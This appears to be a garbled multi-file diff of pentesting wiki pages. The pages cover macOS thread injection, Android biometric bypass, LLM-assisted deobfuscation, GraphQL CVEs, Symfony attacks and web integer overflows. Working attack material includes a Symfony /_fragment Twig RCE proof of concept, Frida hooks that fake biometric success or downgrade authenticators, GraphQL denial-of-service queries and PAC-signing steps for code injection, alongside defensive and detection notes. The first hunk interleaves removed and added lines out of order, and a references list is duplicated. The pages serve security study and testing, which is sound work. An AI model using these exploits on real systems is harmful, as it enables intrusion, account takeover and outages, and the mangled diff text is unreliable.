-   - Allocate the memory for sharing using `mach_vm_allocate()`.
+   * Use `xpc_shmem_create()` to create an `OS_xpc_shmem` object for the allocated region.
-   - Use `xpc_shmem_create()` to create an `OS_xpc_shmem` object for the allocated memory region. This function will manage the creation of the Mach memory entry and store the Mach send right at offset `0x18` of the `OS_xpc_shmem` object.
+2. **Creating shared memory in the remote process**
-
+   * Allocate memory for the `OS_xpc_shmem` object in the remote process (`remote_malloc`).  
-2. **Creating Shared Memory in Remote Process**:
+   * Copy the local template object; fix-up of the embedded Mach send right at offset `0x18` is still required.
-
+3. **Correcting the Mach memory entry**
-   - Allocate memory for the `OS_xpc_shmem` object in the remote process with a remote call to `malloc()`.
+   * Insert a send right with `thread_set_special_port()` and overwrite the `0x18` field with the remote entry’s name.
-   - Copy the contents of the local `OS_xpc_shmem` object to the remote process. However, this initial copy will have incorrect Mach memory entry names at offset `0x18`.
+4. **Finalising**
-
+   * Validate the remote object and map it with a remote call to `xpc_shmem_remote()`.
 3. **Correcting the Mach Memory Entry**:
   - Utilize the `thread_set_special_port()` method to insert a send right for the Mach memory entry into the remote task.
   - Correct the Mach memory entry field at offset `0x18` by overwriting it with the remote memory entry's name.
 4. **Finalizing Shared Memory Setup**:
   - Validate the remote `OS_xpc_shmem` object.
   - Establish the shared memory mapping with a remote call to `xpc_shmem_remote()`.
 By following these steps, shared memory between the local and remote tasks will be efficiently set up, allowing for straightforward data transfers and the execution of functions requiring multiple arguments.
 ## Additional Code Snippets
 For memory allocation and shared memory object creation:
 ```c
 mach_vm_allocate();
 xpc_shmem_create();
 ```
 For creating and correcting the shared memory object in the remote process:
 ```c
 malloc(); // for allocating memory remotely
 thread_set_special_port(); // for inserting send right
 ```
 Remember to handle the details of Mach ports and memory entry names correctly to ensure that the shared memory setup functions properly.
 ## 5. Achieving Full Control
-Upon successfully establishing shared memory and gaining arbitrary execution capabilities, we have essentially gained full control over the target process. The key functionalities enabling this control are:
+Once arbitrary execution and a shared-memory back-channel are available you effectively own the target process:
-1. **Arbitrary Memory Operations**:
+* **Arbitrary memory R/W** — use `memcpy()` between local & shared regions.  
 * **Function calls with > 8 args** — place the extra arguments on the stack following the arm64 calling convention.  
 * **Mach port transfer** — pass rights in Mach messages via the established ports.  
 * **File-descriptor transfer** — leverage fileports (see *triple_fetch*).
-   - Perform arbitrary memory reads by invoking `memcpy()` to copy data from the shared region.
+All of this is wrapped in the [`threadexec`](https://github.com/bazad/threadexec) library for easy re-use.
   - Execute arbitrary memory writes by using `memcpy()` to transfer data to the shared region.
-2. **Handling Function Calls with Multiple Arguments**:
+---
-   - For functions requiring more than 8 arguments, arrange the additional arguments on the stack in compliance with the calling convention.
+## 6. Apple Silicon (arm64e) Nuances
-3. **Mach Port Transfer**:
+On Apple Silicon devices (arm64e) **Pointer Authentication Codes (PAC)** protect all return addresses and many function pointers. Thread-hijacking techniques that *reuse existing code* continue to work because the original values in `lr`/`pc` already carry valid PAC signatures. Problems arise when you try to jump to attacker-controlled memory:
-   - Transfer Mach ports between tasks through Mach messages via previously established ports.
+1. Allocate executable memory inside the target (remote `mach_vm_allocate` + `mprotect(PROT_EXEC)`).
 2. Copy your payload.
 3. Inside the *remote* process sign the pointer:
-4. **File Descriptor Transfer**:
+```c
-   - Transfer file descriptors between processes using fileports, a technique highlighted by Ian Beer in `triple_fetch`.
+uint64_t ptr = (uint64_t)payload;
 ptr = ptrauth_sign_unauthenticated((void*)ptr, ptrauth_key_asia, 0);
 ```
-This comprehensive control is encapsulated within the [threadexec](https://github.com/bazad/threadexec) library, providing a detailed implementation and a user-friendly API for interaction with the victim process.
+4. Set `pc = ptr` in the hijacked thread state.
-## Important Considerations:
+Alternatively, stay PAC-compliant by chaining existing gadgets/functions (traditional ROP).
- Ensure proper use of `memcpy()` for memory read/write operations to maintain system stability and data integrity.
+## 7. Detection & Hardening with EndpointSecurity
 - When transferring Mach ports or file descriptors, follow proper protocols and handle resources responsibly to prevent leaks or unintended access.
-By adhering to these guidelines and utilizing the `threadexec` library, one can efficiently manage and interact with processes at a granular level, achieving full control over the target process.
+The **EndpointSecurity (ES)** framework exposes kernel events that allow defenders to observe or block thread-injection attempts:
 * `ES_EVENT_TYPE_AUTH_GET_TASK` – fired when a process requests another task’s port (e.g. `task_for_pid()`).
 * `ES_EVENT_TYPE_NOTIFY_REMOTE_THREAD_CREATE` – emitted whenever a thread is created in a *different* task.
 * `ES_EVENT_TYPE_NOTIFY_THREAD_SET_STATE` (added in macOS 14 Sonoma) – indicates register manipulation of an existing thread.
 Minimal Swift client that prints remote-thread events:
 ```swift
 import EndpointSecurity
 let client = try! ESClient(subscriptions: [.notifyRemoteThreadCreate]) {
    (_, msg) in
    if let evt = msg.remoteThreadCreate {
        print("[ALERT] remote thread in pid \(evt.target.pid) by pid \(evt.thread.pid)")
    }
 }
 RunLoop.main.run()
 ```
 Querying with **osquery** ≥ 5.8:
 ```sql
 SELECT target_pid, source_pid, target_path
 FROM es_process_events
 WHERE event_type = 'REMOTE_THREAD_CREATE';
 ```
 ### Hardened-runtime considerations
 Distributing your application **without** the `com.apple.security.get-task-allow` entitlement prevents non-root attackers from obtaining its task-port. System Integrity Protection (SIP) still blocks access to many Apple binaries, but third-party software must opt-out explicitly.
 ## 8. Recent Public Tooling (2023-2025)
 | Tool | Year | Remarks |
 |------|------|---------|
 | [`task_vaccine`](https://github.com/rodionovd/task_vaccine) | 2023 | Compact PoC that demonstrates PAC-aware thread hijacking on Ventura/Sonoma |
 | `remote_thread_es` | 2024 | EndpointSecurity helper used by several EDR vendors to surface `REMOTE_THREAD_CREATE` events |
 > Reading these projects’ source code is useful to understand API changes introduced in macOS 13/14 and to stay compatible across Intel ↔ Apple Silicon.
 ## References
 - [https://bazad.github.io/2018/10/bypassing-platform-binary-task-threads/](https://bazad.github.io/2018/10/bypassing-platform-binary-task-threads/)
 - [https://github.com/rodionovd/task_vaccine](https://github.com/rodionovd/task_vaccine)
 - [https://developer.apple.com/documentation/endpointsecurity/es_event_type_notify_remote_thread_create](https://developer.apple.com/documentation/endpointsecurity/es_event_type_notify_remote_thread_create)
 {{#include ../../../../banners/hacktricks-training.md}}
--- a/src/mobile-pentesting/android-app-pentesting/bypass-biometric-authentication-android.md
+++ b/src/mobile-pentesting/android-app-pentesting/bypass-biometric-authentication-android.md
@ -32,7 +32,7 @@ Command to run the Frida script:
 frida -U -f com.generic.insecurebankingfingerprint --no-pause -l fingerprint-bypass-via-exception-handling.js
 ```
-Upon reaching the fingerprint screen and the initiation of `authenticate()`, type `bypass()`` in the Frida console to activate the bypass:
+Upon reaching the fingerprint screen and the initiation of `authenticate()`, type `bypass()` in the Frida console to activate the bypass:
 ```
 Spawning com.generic.insecurebankingfingerprint...
@ -70,12 +70,59 @@ There are specialized tools and scripts designed to test and bypass authenticati
 1. **MAGISK Modules**: MAGISK is a tool for Android that allows users to root their devices and add modules that can modify or spoof hardware-level information, including fingerprints.
 2. **Custom-built Scripts**: Scripts can be written to interact with the Android Debug Bridge (ADB) or directly with the application's backend to simulate or bypass fingerprint authentication.
 ---
 ## **Method 6 – Universal Frida Hook for `BiometricPrompt` (API 28-34)**
 In 2023 a community Frida script branded **Universal-Android-Biometric-Bypass** appeared on CodeShare. The script hooks every overload of `BiometricPrompt.authenticate()` as well as legacy `FingerprintManager.authenticate()` and directly triggers `onAuthenticationSucceeded()` with a **fabricated `AuthenticationResult` containing a null `CryptoObject`**. Because it adapts dynamically to API levels, it still works on Android 14 (API 34) if the target app performs **no cryptographic checks on the returned `CryptoObject`**.
 ```bash
 # Install the script from CodeShare and run it against the target package
 frida -U -f com.target.app --no-pause -l universal-android-biometric-bypass.js
 ```
 Key ideas
 * Everything happens in user space – no kernel exploit or root is required.
 * The attack remains fully silent to the UI: the system biometric dialog never appears.
 * Mitigation: **always verify `result.cryptoObject` and its cipher/signature before unlocking sensitive features**.
 ## **Method 7 – Downgrade / Fallback Manipulation**
 Starting with Android 11, developers can specify which authenticators are acceptable via `setAllowedAuthenticators()` (or the older `setDeviceCredentialAllowed()`). A **runtime hooking** attack can force the `allowedAuthenticators` bit-field to the weaker
 `BIOMETRIC_WEAK | DEVICE_CREDENTIAL` value:
 ```javascript
 // Frida one-liner – replace strong-only policy with weak/device-credential
 var PromptInfoBuilder = Java.use('androidx.biometric.BiometricPrompt$PromptInfo$Builder');
 PromptInfoBuilder.setAllowedAuthenticators.implementation = function(flags){
    return this.setAllowedAuthenticators(0x0002 | 0x8000); // BIOMETRIC_WEAK | DEVICE_CREDENTIAL
 };
 ```
 If the app does **not** subsequently validate the returned `AuthenticationResult`, an attacker can simply press the _PIN/Pattern_ fallback button or even register a new weak biometric to gain access.
 ## **Method 8 – Vendor / Kernel-level CVEs**
 Keep an eye on Android security bulletins: several recent kernel-side bugs allow local privilege escalation through the fingerprint HAL and effectively **disable or short-circuit the sensor pipeline**. Examples include:
 * **CVE-2023-20995** – logic error in `captureImage` of `CustomizedSensor.cpp` (Pixel 8, Android 13) allowing unlock bypass without user interaction.
 * **CVE-2024-53835 / CVE-2024-53840** – “possible biometric bypass due to an unusual root cause” patched in the **December 2024 Pixel bulletin**.
 Although these vulnerabilities target the lock-screen, a rooted tester may chain them with app-level flaws to bypass in-app biometrics as well.
 ---
 ### Hardening Checklist for Developers (Quick Pentester Notes)
 * Enforce `setUserAuthenticationRequired(true)` and `setInvalidatedByBiometricEnrollment(true)` when generating **Keystore** keys. A valid biometric is then required before the key can be used.
 * Reject a `CryptoObject` with **null or unexpected cipher / signature**; treat this as a fatal authentication error.
 * When using `BiometricPrompt`, prefer `BIOMETRIC_STRONG` and **never fall back to `BIOMETRIC_WEAK` or `DEVICE_CREDENTIAL`** for high-risk actions.
 * Pin the latest `androidx.biometric` version (≥1.2.0-beta02) – recent releases add automatic null-cipher checks and tighten allowed authenticator combinations.
 ## References
- [https://securitycafe.ro/2022/09/05/mobile-pentesting-101-bypassing-biometric-authentication/](https://securitycafe.ro/2022/09/05/mobile-pentesting-101-bypassing-biometric-authentication/)
+- [Universal Android Biometric Bypass – Frida CodeShare](https://codeshare.frida.re/@ax/universal-android-biometric-bypass/)
 - [Android Pixel Security Bulletin 2024-12-01](https://source.android.com/security/bulletin/pixel/2024-12-01)
 {{#include ../../banners/hacktricks-training.md}}
--- a/src/mobile-pentesting/android-app-pentesting/manual-deobfuscation.md
+++ b/src/mobile-pentesting/android-app-pentesting/manual-deobfuscation.md
@ -31,8 +31,79 @@ By executing the code in a controlled environment, dynamic analysis **allows for
 - **Identifying Obfuscation Techniques**: By monitoring the application's behavior, dynamic analysis can help identify specific obfuscation techniques being used, such as code virtualization, packers, or dynamic code generation.
 - **Uncovering Hidden Functionality**: Obfuscated code may contain hidden functionalities that are not apparent through static analysis alone. Dynamic analysis allows for the observation of all code paths, including those conditionally executed, to uncover such hidden functionalities.
 ### Automated De-obfuscation with LLMs (Androidmeda)
 While the previous sections focus on fully manual strategies, in 2025 a new class of *Large-Language-Model (LLM) powered* tooling emerged that can automate most of the tedious renaming and control-flow recovery work.  
 One representative project is **[Androidmeda](https://github.com/In3tinct/Androidmeda)** – a Python utility that takes *decompiled* Java sources (e.g. produced by `jadx`) and returns a greatly cleaned-up, commented and security-annotated version of the code.
 #### Key capabilities
 * Renames meaningless identifiers generated by ProGuard / DexGuard / DashO / Allatori / … to *semantic* names.
 * Detects and restructures **control-flow flattening**, replacing opaque switch-case state machines with normal loops / if-else constructs.
 * Decrypts common **string encryption** patterns when possible.
 * Injects **inline comments** that explain the purpose of complex blocks.
 * Performs a *lightweight static security scan* and writes the findings to `vuln_report.json` with severity levels (informational → critical).
 #### Installation
 ```bash
 git clone https://github.com/In3tinct/Androidmeda
 cd Androidmeda
 pip3 install -r requirements.txt
 ```
 #### Preparing the inputs
 1. Decompile the target APK with `jadx` (or any other decompiler) and keep only the *source* directory that contains the `.java` files:
   ```bash
   jadx -d input_dir/ target.apk
   ```
 2. (Optional) Trim `input_dir/` so that it only contains the application packages you want to analyse – this massively speeds-up processing and LLM costs.
 #### Usage examples
 Remote provider (Gemini-1.5-flash):
 ```bash
 export OPENAI_API_KEY=<your_key>
 python3 androidmeda.py \
  --llm_provider google \
  --llm_model gemini-1.5-flash \
  --source_dir input_dir/ \
  --output_dir out/ \
  --save_code true
 ```
 Offline (local `ollama` backend with llama3.2):
 ```bash
 python3 androidmeda.py \
  --llm_provider ollama \
  --llm_model llama3.2 \
  --source_dir input_dir/ \
  --output_dir out/ \
  --save_code true
 ```
 #### Output
 * `out/vuln_report.json` – JSON array with `file`, `line`, `issue`, `severity`.
 * A mirrored package tree with **de-obfuscated `.java` files** (only if `--save_code true`).
 #### Tips & troubleshooting
 * **Skipped class** ⇒ usually caused by an unparsable method; isolate the package or update the parser regex.
 * **Slow run-time / high token usage** ⇒ point `--source_dir` to *specific* app packages instead of the entire decompile.
 * Always *manually review* the vulnerability report – LLM hallucinations can lead to false positives / negatives.
 #### Practical value – Crocodilus malware case study
 Feeding a heavily obfuscated sample from the 2025 *Crocodilus* banking trojan through Androidmeda reduced analysis time from *hours* to *minutes*: the tool recovered call-graph semantics, revealed calls to accessibility APIs and hard-coded C2 URLs, and produced a concise report that could be imported into analysts’ dashboards.
 ---
 ## References and Further Reading
 - [https://maddiestone.github.io/AndroidAppRE/obfuscation.html](https://maddiestone.github.io/AndroidAppRE/obfuscation.html)
 - BlackHat USA 2018: “Unpacking the Packed Unpacker: Reverse Engineering an Android Anti-Analysis Library” [[video](https://www.youtube.com/watch?v=s0Tqi7fuOSU)]
  - This talk goes over reverse engineering one of the most complex anti-analysis native libraries I’ve seen used by an Android application. It covers mostly obfuscation techniques in native code.
 - REcon 2019: “The Path to the Payload: Android Edition” [[video](https://recon.cx/media-archive/2019/Session.005.Maddie_Stone.The_path_to_the_payload_Android_Edition-J3ZnNl2GYjEfa.mp4)]
  - This talk discusses a series of obfuscation techniques, solely in Java code, that an Android botnet was using to hide its behavior.
 - Deobfuscating Android Apps with Androidmeda (blog post) – [mobile-hacker.com](https://www.mobile-hacker.com/2025/07/22/deobfuscating-android-apps-with-androidmeda-a-smarter-way-to-read-obfuscated-code/)
 - Androidmeda source code – [https://github.com/In3tinct/Androidmeda](https://github.com/In3tinct/Androidmeda)
 - [https://maddiestone.github.io/AndroidAppRE/obfuscation.html](https://maddiestone.github.io/AndroidAppRE/obfuscation.html)
 - BlackHat USA 2018: “Unpacking the Packed Unpacker: Reverse Engineering an Android Anti-Analysis Library” \[[video](https://www.youtube.com/watch?v=s0Tqi7fuOSU)]
  - This talk goes over reverse engineering one of the most complex anti-analysis native libraries I’ve seen used by an Android application. It covers mostly obfuscation techniques in native code.
@ -42,4 +113,3 @@ By executing the code in a controlled environment, dynamic analysis **allows for
 {{#include ../../banners/hacktricks-training.md}}
--- a/src/network-services-pentesting/pentesting-web/graphql.md
+++ b/src/network-services-pentesting/pentesting-web/graphql.md
@ -600,6 +600,78 @@ curl -X POST -H "User-Agent: graphql-cop/1.13" -H "Content-Type: application/jso
 'https://example.com/graphql'
 ```
 ## Recent Vulnerabilities (2023-2025)
 > The GraphQL ecosystem evolves very quickly; during the last two years several critical issues were disclosed in the most-used server libraries. When you find a GraphQL endpoint it is therefore worth fingerprinting the engine (see **graphw00f**) and checking the running version against the vulnerabilities below.
 ### CVE-2024-47614 – `async-graphql` directive-overload DoS (Rust)
 * Affected: async-graphql < **7.0.10** (Rust)
 * Root cause: no limit on **duplicated directives** (e.g. thousands of `@include`) which are expanded into an exponential number of execution nodes.
 * Impact: a single HTTP request can exhaust CPU/RAM and crash the service.
 * Fix/mitigation: upgrade ≥ 7.0.10 or call `SchemaBuilder.limit_directives()`; alternatively filter requests with a WAF rule such as `"@include.*@include.*@include"`.
 ```graphql
 # PoC – repeat @include X times
 query overload {
  __typename @include(if:true) @include(if:true) @include(if:true)
 }
 ```
 ### CVE-2024-40094 – `graphql-java` ENF depth/complexity bypass
 * Affected: graphql-java < 19.11, 20.0-20.8, 21.0-21.4
 * Root cause: **ExecutableNormalizedFields** were not considered by `MaxQueryDepth` / `MaxQueryComplexity` instrumentation. Recursive fragments therefore bypassed all limits.
 * Impact: unauthenticated DoS against Java stacks that embed graphql-java (Spring Boot, Netflix DGS, Atlassian products…).
 ```graphql
 fragment A on Query { ...B }
 fragment B on Query { ...A }
 query { ...A }
 ```
 ### CVE-2023-23684 – WPGraphQL SSRF to RCE chain
 * Affected: WPGraphQL ≤ 1.14.5 (WordPress plugin).
 * Root cause: the `createMediaItem` mutation accepted attacker-controlled **`filePath` URLs**, allowing internal network access and file writes.
 * Impact: authenticated Editors/Authors could reach metadata endpoints or write PHP files for remote code execution.
 ---
 ## Incremental delivery abuse: `@defer` / `@stream`
 Since 2023 most major servers (Apollo 4, GraphQL-Java 20+, HotChocolate 13) implemented the **incremental delivery** directives defined by the GraphQL-over-HTTP WG. Every deferred patch is sent as a **separate chunk**, so the total response size becomes *N + 1* (envelope + patches). A query that contains thousands of tiny deferred fields therefore produces a large response while costing the attacker only one request – a classical **amplification DoS** and a way to bypass body-size WAF rules that only inspect the first chunk. WG members themselves flagged the risk. 
 Example payload generating 2 000 patches:
 ```graphql
 query abuse {
 % for i in range(0,2000):
  f{{i}}: __typename @defer
 % endfor
 }
 ```
 Mitigation: disable `@defer/@stream` in production or enforce `max_patches`, cumulative `max_bytes` and execution time. Libraries like **graphql-armor** (see below) already enforce sensible defaults.
 ---
 ## Defensive middleware (2024+)
 | Project | Notes |
 |---|---|
 | **graphql-armor** | Node/TypeScript validation middleware published by Escape Tech. Implements plug-and-play limits for query depth, alias/field/directive counts, tokens and cost; compatible with Apollo Server, GraphQL Yoga/Envelop, Helix, etc. |
 Quick start:
 ```ts
 import { protect } from '@escape.tech/graphql-armor';
 import { applyMiddleware } from 'graphql-middleware';
 const protectedSchema = applyMiddleware(schema, ...protect());
 ```
 `graphql-armor` will now block overly deep, complex or directive-heavy queries, protecting against the CVEs above.
 ---
 ## Tools
 ### Vulnerability scanners
@ -641,5 +713,7 @@ https://graphql-dashboard.herokuapp.com/
 - [**https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/GraphQL%20Injection/README.md**](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/GraphQL%20Injection/README.md)
 - [**https://medium.com/@the.bilal.rizwan/graphql-common-vulnerabilities-how-to-exploit-them-464f9fdce696**](https://medium.com/@the.bilal.rizwan/graphql-common-vulnerabilities-how-to-exploit-them-464f9fdce696)
 - [**https://portswigger.net/web-security/graphql**](https://portswigger.net/web-security/graphql)
 - [**https://github.com/advisories/GHSA-5gc2-7c65-8fq8**](https://github.com/advisories/GHSA-5gc2-7c65-8fq8)
 - [**https://github.com/escape-tech/graphql-armor**](https://github.com/escape-tech/graphql-armor)
 {{#include ../../banners/hacktricks-training.md}}
--- a/src/network-services-pentesting/pentesting-web/symphony.md
+++ b/src/network-services-pentesting/pentesting-web/symphony.md
@ -2,13 +2,127 @@
 {{#include ../../banners/hacktricks-training.md}}
-Take a look to the following posts:
+Symfony is one of the most widely-used PHP frameworks and regularly appears in assessments of enterprise, e-commerce and CMS targets (Drupal, Shopware, Ibexa, OroCRM … all embed Symfony components).  This page collects offensive tips, common mis-configurations and recent vulnerabilities you should have on your checklist when you discover a Symfony application.
- [**https://www.ambionics.io/blog/symfony-secret-fragment**](https://www.ambionics.io/blog/symfony-secret-fragment)
+> Historical note: A large part of the ecosystem still runs the **5.4 LTS** branch (EOL **November 2025**).  Always verify the exact minor version because many 2023-2025 security advisories only fixed in patch releases (e.g. 5.4.46 → 5.4.50).
 - [**hhttps://blog.flatt.tech/entry/2020/11/02/124807**](https://blog.flatt.tech/entry/2020/11/02/124807)
 - [**https://infosecwriteups.com/how-i-was-able-to-find-multiple-vulnerabilities-of-a-symfony-web-framework-web-application-2b82cd5de144**](https://infosecwriteups.com/how-i-was-able-to-find-multiple-vulnerabilities-of-a-symfony-web-framework-web-application-2b82cd5de144)
 ---
 ## Recon & Enumeration
 ### Finger-printing
 * HTTP response headers: `X-Powered-By: Symfony`, `X-Debug-Token`, `X-Debug-Token-Link` or cookies starting with `sf_redirect`, `sf_session`, `MOCKSESSID`.
 * Source code leaks (`composer.json`, `composer.lock`, `/vendor/…`) often reveal the exact version:
  ```bash
  curl -s https://target/vendor/composer/installed.json | jq '.[] | select(.name|test("symfony/")) | .name,.version'
  ```
 * Public routes that only exist on Symfony:
  * `/_profiler`   (Symfony **Profiler** & debug toolbar)
  * `/_wdt/<token>` (“Web Debug Toolbar”)  
  * `/_error/{code}.{_format}` (pretty error pages)  
  * `/app_dev.php`, `/config.php`, `/config_dev.php` (pre-4.0 dev front-controllers)
 * Wappalyzer, BuiltWith or ffuf/feroxbuster wordlists: `symfony.txt` → look for `/_fragment`, `/_profiler`, `.env`, `.htaccess`.
 ### Interesting files & endpoints
 | Path | Why it matters |
 |------|----------------|
 | `/.env`, `/.env.local`, `/.env.prod` | Frequently mis-deployed → leaks `APP_SECRET`, DB creds, SMTP, AWS keys |
 | `/.git`, `.svn`, `.hg` | Source disclosure → credentials + business logic |
 | `/var/log/*.log`, `/log/dev.log` | Web-root mis-configuration exposes stack-traces |
 | `/_profiler` | Full request history, configuration, service container, **APP_SECRET** (≤ 3.4) |
 | `/_fragment` | Entry point used by ESI/HInclude.  Abuse possible once you know `APP_SECRET` |
 | `/vendor/phpunit/phpunit/phpunit` | PHPUnit RCE if accessible (CVE-2017-9841) |
 | `/index.php/_error/{code}` | Finger-print & sometimes leak exception traces |
 ---
 ## High-impact Vulnerabilities (2023-2025)
 ### 1. APP_SECRET disclosure ➜ RCE via `/_fragment` (aka “secret-fragment”)
 * **CVE-2019-18889** originally, but *still* appears on modern targets when debug is left enabled or `.env` is exposed.
 * Once you know the 32-char `APP_SECRET`, craft an HMAC token and abuse the internal `render()` controller to execute arbitrary Twig:
  ```python
  # PoC – requires the secret
  import hmac, hashlib, requests, urllib.parse as u
  secret = bytes.fromhex('deadbeef…')
  payload = "{{['id']|filter('system')}}"   # RCE in Twig
  query = {
      'template': '@app/404.html.twig',
      'filter': 'raw',
      '_format': 'html',
      '_locale': 'en',
      'globals[cmd]': 'id'
  }
  qs = u.urlencode(query, doseq=True)
  token = hmac.new(secret, qs.encode(), hashlib.sha256).hexdigest()
  r = requests.get(f"https://target/_fragment?{qs}&_token={token}")
  print(r.text)
  ```
 * Excellent write-up & exploitation script: Ambionics blog (linked in References).
 ### 2. Windows Process Hijack – CVE-2024-51736
 * The `Process` component searched the current working directory **before** `PATH` on Windows.  An attacker able to upload `tar.exe`, `cmd.exe`, etc. in a writable web-root and trigger `Process` (e.g. file extraction, PDF generation) gains command execution.
 * Patched in 5.4.50, 6.4.14, 7.1.7.
 ### 3. Session-Fixation – CVE-2023-46733
 * Authentication guard reused an existing session ID after login.  If an attacker sets the cookie **before** the victim authenticates, they hijack the account post-login.
 ### 4. Twig sandbox XSS – CVE-2023-46734
 * In applications that expose user-controlled templates (admin CMS, email builder) the `nl2br` filter could be abused to bypass the sandbox and inject JS.
 ### 5. Symfony 1 gadget chains (still found in legacy apps)
 * `phpggc symfony/1 system id` produces a Phar payload that triggers RCE when an unserialize() happens on classes such as `sfNamespacedParameterHolder`.  Check file-upload endpoints and `phar://` wrappers.
 {{#ref}}
 ../../pentesting-web/deserialization/php-deserialization-+-autoload-classes.md
 {{#endref}}
 ---
 ## Exploitation Cheat-Sheet
 ### Calculate HMAC token for `/_fragment`
 ```bash
 python - <<'PY'
 import sys, hmac, hashlib, urllib.parse as u
 secret = bytes.fromhex(sys.argv[1])
 qs     = u.quote_plus(sys.argv[2], safe='=&')
 print(hmac.new(secret, qs.encode(), hashlib.sha256).hexdigest())
 PY deadbeef… "template=@App/evil&filter=raw&_format=html"
 ```
 ### Bruteforce weak `APP_SECRET`
 ```bash
 cewl -d3 https://target -w words.txt
 symfony-secret-bruteforce.py -w words.txt -c abcdef1234567890 https://target
 ```
 ### RCE via exposed Symfony Console
 If `bin/console` is reachable through `php-fpm` or direct CLI upload:
 ```bash
 php bin/console about        # confirm it works
 php bin/console cache:clear --no-warmup
 ```
 Use deserialization gadgets inside the cache directory or write a malicious Twig template that will be executed on the next request.
 ---
 ## Defensive notes
 1. **Never deploy debug** (`APP_ENV=dev`, `APP_DEBUG=1`) to production; block `/app_dev.php`, `/_profiler`, `/_wdt` in the web-server config.
 2. Store secrets in env vars or `vault/secrets.local.php`, *never* in files accessible through the document-root.
 3. Enforce patch management – subscribe to Symfony security advisories and keep at least the LTS patch-level.
 4. If you run on Windows, upgrade immediately to mitigate CVE-2024-51736 or add a `open_basedir`/`disable_functions` defence-in-depth.
 ---
 ### Useful offensive tooling
 * **ambionics/symfony-exploits** – secret-fragment RCE, debugger routes discovery.
 * **phpggc** – Ready-made gadget chains for Symfony 1 & 2.
 * **sf-encoder** – small helper to compute `_fragment` HMAC (Go implementation).
 ## References
 * [Ambionics – Symfony “secret-fragment” Remote Code Execution](https://www.ambionics.io/blog/symfony-secret-fragment)
 * [Symfony Security Advisory – CVE-2024-51736: Command Execution Hijack on Windows Process Component](https://symfony.com/blog/cve-2024-51736-command-execution-hijack-on-windows-with-process-class)
 {{#include ../../banners/hacktricks-training.md}}
--- a/src/pentesting-web/xss-cross-site-scripting/integer-overflow.md
+++ b/src/pentesting-web/xss-cross-site-scripting/integer-overflow.md
@ -1,14 +1,111 @@
-# Integer Overflow
+# Integer Overflow (Web Applications)
 {{#include ../../banners/hacktricks-training.md}}
-Check:
+> This page focuses on how **integer overflows/truncations can be abused in web applications and browsers**.  For exploitation primitives inside native binaries you can continue reading the dedicated page:
 >
 > {{#ref}}
 > ../../binary-exploitation/integer-overflow.md
 > {{#endref}}
-{{#ref}}
+---
 ../../binary-exploitation/integer-overflow.md
 {{#endref}}
 ## 1. Why integer math still matters on the web
 Even though most business-logic in modern stacks is written in *memory-safe* languages, the underlying runtime (or third-party libraries) is eventually implemented in C/C++.  Whenever user-controlled numbers are used to allocate buffers, compute offsets, or perform length checks, **a 32-bit or 64-bit wrap-around may transform an apparently harmless parameter into an out-of-bounds read/write, a logic bypass or a DoS**.
 Typical attack surface:
 1. **Numeric request parameters** – classic `id`, `offset`, or `count` fields.
 2. **Length / size headers** – `Content-Length`, WebSocket frame length, HTTP/2 `continuation_len`, etc.
 3. **File-format metadata parsed server-side or client-side** – image dimensions, chunk sizes, font tables.
 4. **Language-level conversions** – signed↔unsigned casts in PHP/Go/Rust FFI, JS `Number` → `int32` truncations inside V8.
 5. **Authentication & business logic** – coupon value, price, or balance calculations that silently overflow.
 ---
 ## 2. Recent real-world vulnerabilities (2023-2025)
 | Year | Component | Root cause | Impact |
 |------|-----------|-----------|--------|
 | 2023 | **libwebp – CVE-2023-4863** | 32-bit multiplication overflow when computing decoded pixel size | Triggered a Chrome 0-day (`BLASTPASS` on iOS), allowed *remote code execution* inside the renderer sandbox.  |
 | 2024 | **V8 – CVE-2024-0519** | Truncation to 32-bit when growing a `JSArray` leads to OOB write on the backing store | Remote code execution after a single visit.  |
 | 2025 | **Apollo GraphQL Server** (unreleased patch) | 32-bit signed integer used for `first/last` pagination args; negative values wrap to huge positives | Logic bypass & memory exhaustion (DoS). |
 ---
 ## 3. Testing strategy
 ### 3.1 Boundary-value cheat-sheet
 Send **extreme signed/unsigned values** wherever an integer is expected:
 ```
 -1, 0, 1,
 127, 128, 255, 256,
 32767, 32768, 65535, 65536,
 2147483647, 2147483648, 4294967295,
 9223372036854775807, 9223372036854775808,
 0x7fffffff, 0x80000000, 0xffffffff
 ```
 Other useful formats:
 * Hex (`0x100`), octal (`0377`), scientific (`1e10`), JSON big-int (`9999999999999999999`).
 * Very long digit strings (>1kB) to hit custom parsers.
 ### 3.2 Burp Intruder template
 ```
 §INTEGER§
 Payload type: Numbers
 From: -10 To: 4294967300 Step: 1
 Pad to length: 10, Enable hex prefix 0x
 ```
 ### 3.3 Fuzzing libraries & runtimes
 * **AFL++/Honggfuzz** with `libFuzzer` harness around the parser (e.g., WebP, PNG, protobuf).
 * **Fuzzilli** – grammar-aware fuzzing of JavaScript engines to hit V8/JSC integer truncations.
 * **boofuzz** – network-protocol fuzzing (WebSocket, HTTP/2) focusing on length fields.
 ---
 ## 4. Exploitation patterns
 ### 4.1 Logic bypass in server-side code (PHP example)
 ```php
 $price = (int)$_POST['price'];          // expecting cents (0-10000)
 $total = $price * 100;                  // ← 32-bit overflow possible
 if($total > 1000000){
    die('Too expensive');
 }
 /* Sending price=21474850 → $total wraps to ‑2147483648 and check is bypassed */
 ```
 ### 4.2 Heap overflow via image decoder (libwebp 0-day)
 The WebP lossless decoder multiplied image width × height × 4 (RGBA) inside a 32-bit `int`.  A crafted file with dimensions `16384 × 16384` overflows the multiplication, allocates a short buffer and subsequently writes **~1GB** of decompressed data past the heap – leading to RCE in every Chromium-based browser before 116.0.5845.187.
 ### 4.3 Browser-based XSS/RCE chain
 1. **Integer overflow** in V8 gives arbitrary read/write.
 2. Escape the sandbox with a second bug or call native APIs to drop a payload.
 3. The payload then injects a malicious script into the origin context → stored XSS.
 ---
 ## 5. Defensive guidelines
 1. **Use wide types or checked math** – e.g., `size_t`, Rust `checked_add`, Go `math/bits.Add64`.
 2. **Validate ranges early**: reject any value outside business domain before arithmetic.
 3. **Enable compiler sanitizers**: `-fsanitize=integer`, UBSan, Go race detector.
 4. **Adopt fuzzing in CI/CD** – combine coverage feedback with boundary corpora.
 5. **Stay patched** – browser integer overflow bugs are frequently weaponised within weeks.
 ---
 ## References
 * [NVD CVE-2023-4863 – libwebp Heap Buffer Overflow](https://nvd.nist.gov/vuln/detail/CVE-2023-4863)
 * [Google Project Zero – "Understanding V8 CVE-2024-0519"](https://googleprojectzero.github.io/)
